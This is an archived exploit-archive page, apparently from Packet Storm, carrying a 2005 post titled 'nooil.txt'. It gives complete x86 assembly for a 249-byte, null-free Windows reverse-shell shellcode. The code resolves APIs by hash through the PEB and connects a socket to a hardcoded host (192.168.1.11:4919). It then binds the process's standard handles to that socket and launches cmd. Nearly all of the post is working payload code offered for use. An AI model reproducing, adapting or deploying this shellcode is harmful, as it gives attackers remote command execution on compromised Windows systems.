what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

nooil.txt

nooil.txt
Posted Aug 17, 2005
Authored by Matthieu Suiche

New generation shellcode using 'nooil tricks' methodology. 249 bytes reverse generic shellcode without loader (no null byte).

tags | shellcode
SHA-256 | fd35c001c46f13468f2d40f4e5dee47a5e1803c677189bf3889635375ef9f4bd

nooil.txt

Change Mirror Download
We use the PEB for the Output/Input/Error Handles.

typedef struct PEB
BOOLEAN InheritedAddressSpace ;
BOOLEAN ReadImageFileExecOptions ;
BOOLEAN BeingDebugged ;
BOOLEAN Spare ;
HANDLE Mutant ;
PVOID ImageBaseAddress ;
PPEB LDR DATA LoaderData ;
PRTL USER PROCESS PARAMETERS ProcessParameters ;
...
typedef struct RTL USER PROCESS PARAMETERS
ULONG MaximumLength ;
ULONG Length ;
ULONG Flags ;
ULONG DebugFlags ;
PVOID ConsoleHandle ;
ULONG ConsoleFlags ;
HANDLE StdInputHandle ; +18h
HANDLE StdOutputHandle ; +1Ch
HANDLE StdErrorHandle ; +20h
...

So with the nooil tricks we have now :
mov eax,dword ptr fs :[18h]
mov eax,dword ptr ds :[eax+30h]
mov eax,dword ptr ds :[eax+10h]
mov ecx, hClientSocket
mov dword ptr ds :[eax+18h],ecx ; SetStdHandle(STD INPUT HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+1Ch],ecx ; SetStdHandle(STD OUTPUT HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+20h],ecx ; SetStdHandle(STD ERROR HANDLE,hClientSocket) ;

249 bytes Reverse Generic Shellcode without loader(no null byte) :

comment *
-----------------------------------------------------------------
---- New generation shellcode using my "nooil tricks" methods ---
---- (c) 2005 - Matthieu Suiche / msuiche@gmail.com ---
249 bytes Reverse Generic Shellcode without loader(no null byte)
-----------------------------------------------------------------
hehe hi metasploit's guys ;)
*
.386
.model flat, stdcall

assume fs:nothing

LoadLibraryA equ 0D6C3D898h
WSAStartupA equ 0C7B3B4CBh
WSASocketA equ 0B8ACB6C6h
connect equ 06EE2D2C8h
system equ 0E873E6D8h
ExitProcessA equ 0D7D8EA95h
; ------------------------------
sin_addr equ 0B01A8C0h ; 192.168.1.11
sin_port equ 3713h ; 4919
; ------------------------------
str_cmd equ 0FF646D63h

; ----------------------------------------------------
_nooil_ segment public ; writable section
;.
; ----- CODE -----
scode:
jmp short _eip
GetEip:
pop edi
jmp short EntryPoint
_eip:
call GetEip
Kernel32BaseAddr:
pushad
test eax, eax
jnz MyGetProcAddr
; eax = 0
mov eax, dword ptr fs:[eax+30h]
mov eax, dword ptr ds:[eax+0ch]
mov esi, dword ptr ds:[eax+1ch]
lodsd
mov eax, dword ptr ds:[eax+08h]
MyGetProcAddr:
mov edx, eax

; - PE
add edx, dword ptr ds:[edx+3ch]

; - Export Table
mov edx, dword ptr ds:[edx+78h]
add edx, eax

mov ebx, dword ptr ds:[edx+20h]
add ebx, eax

xor ecx, ecx
mov ebp, eax

FindAddr:
inc ecx
mov edi, dword ptr ds:[ebx+ecx*4]
add edi, eax

mov esi, dword ptr [edi]
add esi, dword ptr [edi+4]
cmp esi, [esp+36]
jz AddrFound
jmp short FindAddr

AddrFound:

mov ebx, dword ptr ds:[edx+24h]
add ebx, ebp
mov cx,word ptr ds:[ebx+ecx*2]

mov ebx, dword ptr ds:[edx+1Ch]
add ebx, ebp
add ebp, dword ptr ds:[ebx+ecx*4]

mov dword ptr [esp+28], ebp
popad
retn

EntryPoint:
xor eax, eax
xor ecx, ecx
push LoadLibraryA
call edi ; MyGetProcAddr(LoadLibraryA);
mov ebp, eax

push cx
push word ptr '23'
push '_2sw'
push esp
call eax ; LoadLibraryA("ws2_32");

mov ebx, eax

push WSAStartupA
call edi ; MyGetProcAddr(WSAStartupA)


mov esi, esp
add si, -301h
push esi
push 2
call eax ; WSAStartup(2,&WSAstruct);

mov eax, ebx

push WSASocketA
call edi ; MyGetProcAddr(WSASocketA);

xor esi, esi
push esi
push esi
push esi
push esi
inc esi
push esi
inc esi
push esi
call eax ; WSASocket(2,1,0,0,0,0);

xchg ebx, eax ; ebx = sockfd , eax = ws2_32

push sin_addr
push word ptr sin_port
push si
mov esi, esp

push connect
call edi ; MyGetProcAddr(connect)

push 10h
push esi
push ebx
call eax ; connect(sockfd, &struct, sizeof(struct));

push ax
push word ptr 'tr'
push 'cvsm'
push esp
call ebp ; LoadLibraryA("msvcrt");

push system
call edi ; MyGetProcAddr(system);

; ----------------------------- nooil tricks ----------------------------------
xor ecx, ecx
mov ecx,dword ptr fs:[ecx+18h]
mov ecx,dword ptr ds:[ecx+30h]
mov ecx,dword ptr ds:[ecx+10h]
mov dword ptr ds:[ecx+18h],ebx ; SetStdHandle(STD_INPUT_HANDLE,hClient);
mov dword ptr ds:[ecx+1Ch],ebx ; SetStdHandle(STD_OUTPUT_HANDLE,hClient);
mov dword ptr ds:[ecx+20h],ebx ; SetStdHandle(STD_ERROR_HANDLE,hClient);
; -----------------------------------------------------------------------------


push str_cmd
inc byte ptr [esp+3]
push esp
call eax ; system("cmd");

; Exit
push ExitProcessA
call edi ; MyGetProcAddr(ExitProcessA)
call eax ; ExitProcessA();
end scode
; ------ END CODE ------
;.
_nooil_ ends
; ----------------------------------------------------
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close